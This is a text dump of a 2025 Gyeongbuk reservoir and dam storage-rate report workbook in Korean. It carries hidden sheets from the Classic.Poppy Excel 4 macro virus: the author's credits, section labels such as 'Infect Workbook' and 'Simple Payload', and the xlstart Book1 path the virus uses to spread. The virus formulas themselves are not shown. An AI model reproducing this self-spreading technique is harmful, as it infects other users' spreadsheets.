Workbook
Name aa: [1]XL4Poppy!$C$31
Name Document_array: {"Book1","경북저수율(10월1일-결재).xls"}
Name Document_array: {"Book1","경북저수율(10월1일-결재).xls"}
Name Document_array: {"Book1","경북저수율(10월1일-결재).xls"}
Name Document_array: {"Book1","경북저수율(9월17일-결재).xls","080917저수지저수상황.xls"}
Name Document_array: {"Book1"}

Sheet 000000

Sheet 100000

Sheet xxxxxxxx
A1: 경북저수율(9월17일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet1
A1: 경북저수율(10월1일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet2
A1: 경북저수율(10월1일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet3
A1: 경북저수율(10월1일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet 시군별
A1: 2025년 저수지 저수현황 보고
A3: □ 저수지 저수상황
A4: 구 분 | C4: 저수지수 | D4: 수혜면적 | E4: 유효저수량 | F4: 현저수량 | G4: 저수율 (%)
D5: (ha) | E5: (천㎥) | F5: (천㎥) | G5: 금주 | H5: 전주 | I5: 전년 | J5: 평년
A6: 경 | B6: 합 계 | C6: 5000 | D6: 60558.4 | E6: 510131 | F6: 275832.93 | G6: 54.1 | H6: 52 | I6: 64.3 | J6: 70.634968
B7: 시군관리 | C7: 4348 | D7: 21873.7 | E7: 80630 | F7: 60031.391 | G7: 74.5 | H7: 70.7 | I7: 77.6 | J7: 79.161905
A8: 북 | B8: 공사관리 | C8: 652 | D8: 38684.7 | E8: 429501 | F8: 215801.54 | G8: 50.2 | H8: 48.5 | I8: 61.8 | J8: 68.262956
A9: 포 | B9: 소 계 | C9: 275 | D9: 5853.6 | E9: 45243 | F9: 21617.481 | G9: 47.78083 | H9: 45.165152 | I9: 49.71498 | J9: 71.641611
A10: 항 | B10: 시 관 리 | C10: 218 | D10: 1956.9 | E10: 4133 | F10: 2843.504 | G10: 68.8 | H10: 62.9 | I10: 73.1 | J10: 75
A11: 시 | B11: 공사관리 | C11: 57 | D11: 3896.7 | E11: 41110 | F11: 18773.977 | G11: 45.667665 | H11: 43.382176 | I11: 47.373201 | J11: 68.283222
A12: 경 | B12: 소 계 | C12: 391 | D12: 9677.3 | E12: 75054 | F12: 46877.534 | G12: 62.458409 | H12: 61.591256 | I12: 67.074834 | J12: 74.029726
A13: 주 | B13: 시 관 리 | C13: 315 | D13: 3448.6 | E13: 5713 | F13: 4119.073 | G13: 72.1 | H13: 70.6 | I13: 74.2 | J13: 82.5
A14: 시 | B14: 공사관리 | C14: 76 | D14: 6228.7 | E14: 69341 | F14: 42758.461 | G14: 61.664039 | H14: 60.849026 | I14: 66.487792 | J14: 65.559452
A15: 김 | B15: 소 계 | C15: 252 | D15: 2348.2 | E15: 9753 | F15: 6698.29 | G15: 68.679278 | H15: 65.99007 | I15: 72.016713 | J15: 81.527643
A16: 천 | B16: 시 관 리 | C16: 244 | D16: 1676.8 | E16: 3045 | F16: 2590.686 | G16: 85.08 | H16: 82.75 | I16: 88.6 | J16: 84
A17: 시 | B17: 공사관리 | C17: 8 | D17: 671.4 | E17: 6708 | F17: 4107.604 | G17: 61.234407 | H17: 58.382141 | I17: 64.488968 | J17: 79.055286
A18: 안 | B18: 소 계 | C18: 180 | D18: 2470.6 | E18: 13363 | F18: 6839.6106 | G18: 51.183197 | H18: 51.192315 | I18: 66.696107 | J18: 74.190519
A19: 동 | B19: 시 관 리 | C19: 162 | D19: 1714.9 | E19: 5121 | F19: 3620.547 | G19: 70.7 | H19: 72.1 | I19: 83.3 | J19: 83
... A71: 군 | B71: 공사관리 | C71: 7 | D71: 566.9 | E71: 6600 | F71: 4730.2003 | G71: 71.669702 | H71: 64.314177 | I71: 90.382442 | J71: 66.251535

Sheet 총괄
A2: 저 수 지 저 수 상 황
A3: =[2]결재!A3:J3 -> 45915
A5: □ 저수지수 : | B5: =B6+F6 -> 5000 | C5: (유효저수량 | E5: =[2]시군별!E6 -> 510131 | G5: 수혜면적 | I5: 60558.4
A6: ㅇ 시 · 군 : | B6: 4348 | C6: 한국농어촌공사 : | F6: 652
A9: □ 저 수 율 : | B9: =[2]시군별!G6 -> 54.1 | C9: % | D9: =[2]결재!D9 -> (2024년동기 : | F9: =[2]시군별!I6 -> 64.3 | G9: %, | H9: 평년 : | I9: =[2]시군별!J6 -> 70.634968 | J9: %)
A11: ㅇ 시 · 군 : | B11: =[2]시군별!G7 -> 74.5 | C11: % | D11: ( 〃 : | F11: =[2]시군별!I7 -> 77.6 | G11: %, | H11: 〃 : | I11: =[2]시군별!J7 -> 79.161905 | J11: %)
A13: ㅇ 한 농 공 : | B13: =[2]시군별!G8 -> 50.2 | C13: % | D13: ( 〃 : | F13: =[2]시군별!I8 -> 61.8 | G13: %, | H13: 〃 : | I13: =[2]시군별!J8 -> 68.262956 | J13: %)
A15: □ 주요댐 저수율
A17: ㅇ 안 동 댐 : | B17: =[2]결재!B17 -> 41.8 | C17: % | D17: =[2]결재!D17 -> (2024년동기 : | F17: =[2]결재!F17 -> 0.614 | G17: , | H17: 평년 : | I17: =[2]결재!I17 -> 0.585 | J17: )
F18: .
A19: ㅇ 임 하 댐 : | B19: =[2]결재!B19 -> 52.2 | C19: % | D19: ( 〃 : | F19: =[2]결재!F19 -> 0.495 | G19: , | H19: 〃 : | I19: =[2]결재!I19 -> 0.521 | J19: )
A21: ㅇ 영 주 댐 : | B21: =[2]결재!B21 -> 24 | C21: % | D21: ( 〃 : | F21: =[2]결재!F21 -> 0.445 | G21: , | H21: 〃 : | I21: =[2]결재!I21 -> 0.512 | J21: )
A23: ㅇ 영 천 댐 : | B23: =[2]결재!B23 -> 62.3 | C23: % | D23: ( 〃 : | F23: =[2]결재!F23 -> 0.456 | G23: , | H23: 〃 : | I23: =[2]결재!I23 -> 0.562 | J23: )
A25: ㅇ 운 문 댐 : | B25: =[2]결재!B25 -> 60.1 | C25: % | D25: ( 〃 : | F25: =[2]결재!F25 -> 0.502 | G25: , | H25: 〃 : | I25: =[2]결재!I25 -> 0.605 | J25: )
A27: ㅇ 군 위 댐 : | B27: =[2]결재!B27 -> 54 | C27: % | D27: ( 〃 : | F27: =[2]결재!F27 -> 0.552 | G27: , | H27: 〃 : | I27: =[2]결재!I27 -> 0.495 | J27: )
A29: ㅇ 부 항 댐 : | B29: =[2]결재!B29 -> 47.3 | C29: % | D29: ( 〃 : | F29: =[2]결재!F29 -> 0.653 | G29: , | H29: 〃 : | I29: =[2]결재!I29 -> 0.573 | J29: )
A31: ㅇ 경 천 댐 : | B31: =[2]결재!B31 -> 23.3 | C31: % | D31: ( 〃 : | F31: =[2]결재!F31 -> 0.424 | G31: , | H31: 〃 : | I31: =[2]결재!I31 -> 0.645 | J31: )
A33: ㅇ 성 주 댐 : | B33: =[2]결재!B33 -> 44.5 | C33: % | D33: ( 〃 : | F33: =[2]결재!F33 -> 0.282 | G33: , | H33: 〃 : | I33: =[2]결재!I33 -> 0.822 | J33: )
A35: ◆ 강 우 량
A36: =[2]결재!A37 -> ㅇ2025.01.01~ | B36: =[2]결재!B37 -> 45915 | C36: =[2]결재!C37:D37 -> 755.2 | E36: =[2]결재!E37 -> (전년 856.4 평년 897.5)
